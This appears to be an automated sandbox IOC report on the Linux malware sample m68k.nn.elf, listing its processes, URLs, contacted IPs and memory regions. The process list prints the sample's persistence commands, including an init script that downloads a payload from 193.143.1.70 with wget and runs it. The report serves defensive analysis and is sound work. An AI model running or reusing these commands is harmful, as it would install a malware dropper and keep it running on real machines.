Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

/tmp/m68k.nn.elf

/bin/sh

sh -c "systemctl enable custom.service >/dev/null 2>&1"

/bin/sh

/usr/bin/systemctl

systemctl enable custom.service

/tmp/m68k.nn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/system

/tmp/m68k.nn.elf

/bin/sh

sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/system /etc/rcS.d/S99system

/tmp/m68k.nn.elf

/bin/sh

sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf"

/tmp/m68k.nn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/m68k.nn.elf

/tmp/m68k.nn.elf

/bin/sh

sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

/bin/sh

/usr/bin/mkdir

mkdir -p /etc/rc.d

/tmp/m68k.nn.elf

/bin/sh

sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf

/tmp/m68k.nn.elf

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

/usr/libexec/gsd-housekeeping

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/sbin/gdm3

/etc/gdm3/PrimeOff/Default

/usr/sbin/gdm3

/etc/gdm3/PrimeOff/Default

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/systemd/systemd

/lib/systemd/systemd-user-runtime-dir

/lib/systemd/systemd-user-runtime-dir stop 127

There are 47 hidden processes, click here to show them.

URLs

Name

Malicious

http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi

unknown

http://193.143.1.70/curl.sh

unknown

Details

Name:	http://193.143.1.70/curl.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/m68k.nn.elf
Source:	m68k.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://193.143.1.70/lol.sh

unknown

Details

Name:	http://193.143.1.70/lol.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/m68k.nn.elf
Source:	m68k.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://193.143.1.70/

unknown

Details

Name:	http://193.143.1.70/
TargetID:	-1
From Memory:	true
Source:	m68k.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, m68k.nn.elf.36.dr, bootcmd.12.dr, custom.service.12.dr
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

Domains

Name

Malicious

daisy.ubuntu.com

162.213.35.25

Details

Name:	daisy.ubuntu.com
IP:	162.213.35.25
TargetID:	-1
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol

IPs

Domain

Country

Malicious

151.138.203.206

unknown

United States

177.86.118.243

unknown

Brazil

206.11.204.100

unknown

United States

168.11.78.213

unknown

United States

84.55.130.123

unknown

France

24.188.149.252

unknown

United States

218.129.90.226

unknown

Japan

134.55.122.247

unknown

United States

14.177.80.88

unknown

Viet Nam

217.223.132.116

unknown

Italy

49.7.231.56

unknown

China

36.195.207.234

unknown

China

187.223.53.72

unknown

Mexico

204.182.210.68

unknown

United States

99.231.30.229

unknown

Canada

48.22.139.96

unknown

United States

20.22.92.119

unknown

United States

131.85.129.14

unknown

United States

72.199.186.161

unknown

United States

63.255.97.23

unknown

United States

202.236.159.181

unknown

Japan

107.242.115.183

unknown

United States

22.249.83.107

unknown

United States

106.187.97.18

unknown

Japan

46.56.162.63

unknown

Belarus

113.37.197.159

unknown

Japan

15.48.214.182

unknown

United States

214.189.46.107

unknown

United States

146.31.175.1

unknown

United States

154.221.71.232

unknown

Seychelles

66.21.196.104

unknown

United States

8.92.12.98

unknown

United States

21.201.0.250

unknown

United States

129.25.60.152

unknown

United States

222.33.117.145

unknown

China

118.197.249.107

unknown

China

213.87.65.79

unknown

Russian Federation

158.6.65.21

unknown

United States

18.255.222.142

unknown

United States

187.2.134.187

unknown

Brazil

163.159.12.150

unknown

Slovenia

171.193.184.254

unknown

United States

89.248.199.156

unknown

Russian Federation

161.194.231.250

unknown

United States

38.64.125.175

unknown

United States

131.120.246.203

unknown

United States

109.58.235.207

unknown

Sweden

62.56.73.123

unknown

United Kingdom

185.217.18.35

unknown

Kazakhstan

51.165.160.218

unknown

United States

18.125.252.34

unknown

United States

168.212.144.208

unknown

United States

31.219.235.255

unknown

United Arab Emirates

177.179.160.64

unknown

Brazil

128.50.155.85

unknown

United States

93.111.37.224

unknown

Austria

214.3.247.86

unknown

United States

218.92.250.87

unknown

China

165.126.125.91

unknown

United States

104.220.62.108

unknown

United States

221.189.74.98

unknown

Japan

185.145.77.58

unknown

France

90.37.62.198

unknown

France

177.140.159.237

unknown

Brazil

216.125.52.121

unknown

United States

207.90.135.123

unknown

United States

118.253.105.108

unknown

China

153.25.25.188

unknown

United States

132.58.133.157

unknown

United States

23.143.219.42

unknown

Reserved

119.255.16.113

unknown

China

13.28.34.140

unknown

United States

81.213.35.110

unknown

Turkey

186.31.3.133

unknown

Colombia

187.229.212.172

unknown

Mexico

41.158.210.249

unknown

Gabon

162.213.143.94

unknown

United States

122.183.205.88

unknown

India

181.98.53.241

unknown

Argentina

32.195.167.55

unknown

United States

113.163.190.100

unknown

Viet Nam

209.100.127.168

unknown

United States

117.232.210.63

unknown

India

9.65.56.210

unknown

United States

106.154.0.189

unknown

Japan

88.60.89.96

unknown

Italy

222.127.132.5

unknown

Philippines

88.117.191.218

unknown

Austria

101.74.97.167

unknown

China

21.153.96.182

unknown

United States

33.72.120.213

unknown

United States

176.129.70.251

unknown

France

131.77.109.43

unknown

United States

54.176.148.48

unknown

United States

193.143.1.70

unknown

108.53.54.74

unknown

United States

217.20.210.82

unknown

Syrian Arab Republic

2.239.104.171

unknown

Italy

193.168.189.106

unknown

Russian Federation

72.221.209.84

unknown

United States

There are 90 hidden IPs, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

7f844c01e000

page execute read

7f844c01e000

page execute read

7f84d193c000

page read and write

7f84d219f000

page read and write

55e821c84000

page execute read

7f84cc000000

page read and write

55e821c84000

page execute read

55e823ebc000

page execute and read and write

55e823f53000

page read and write

7f84d1cfe000

page read and write

7f84d0e9c000

page read and write

55e821ebe000

page read and write

7f84d21e4000

page read and write

7f84d0e9c000

page read and write

7f84cc021000

page read and write

7f84d1d23000

page read and write

7f84cc000000

page read and write

55e823ebc000

page execute and read and write

7fff1259d000

page execute read

7f84d1cfe000

page read and write

7f84d16ad000

page read and write

55e821eb6000

page read and write

7f84d206e000

page read and write

7f844c020000

page read and write

7f84d206e000

page read and write

7f844c020000

page read and write

55e824863000

page read and write

7f84d169f000

page read and write

7f84d193c000

page read and write

7f844c029000

page read and write

7f84d2197000

page read and write

7fff124f3000

page read and write

7f84d2197000

page read and write

55e821ebe000

page read and write

7f844c024000

page read and write

7f84d21e4000

page read and write

7fff1259d000

page execute read

55e824863000

page read and write

55e823f53000

page read and write

7f84d219f000

page read and write

7f84d1d23000

page read and write

7f84cc021000

page read and write

55e821eb6000

page read and write

7fff124f3000

page read and write

7f84d16ad000

page read and write

7f844c024000

page read and write

7f84d169f000

page read and write

There are 37 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
m68k.nn.elf

Files

Processes

URLs

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportm68k.nn.elf

Files

Processes

URLs

Domains

IPs

Memdumps

IOC Report
m68k.nn.elf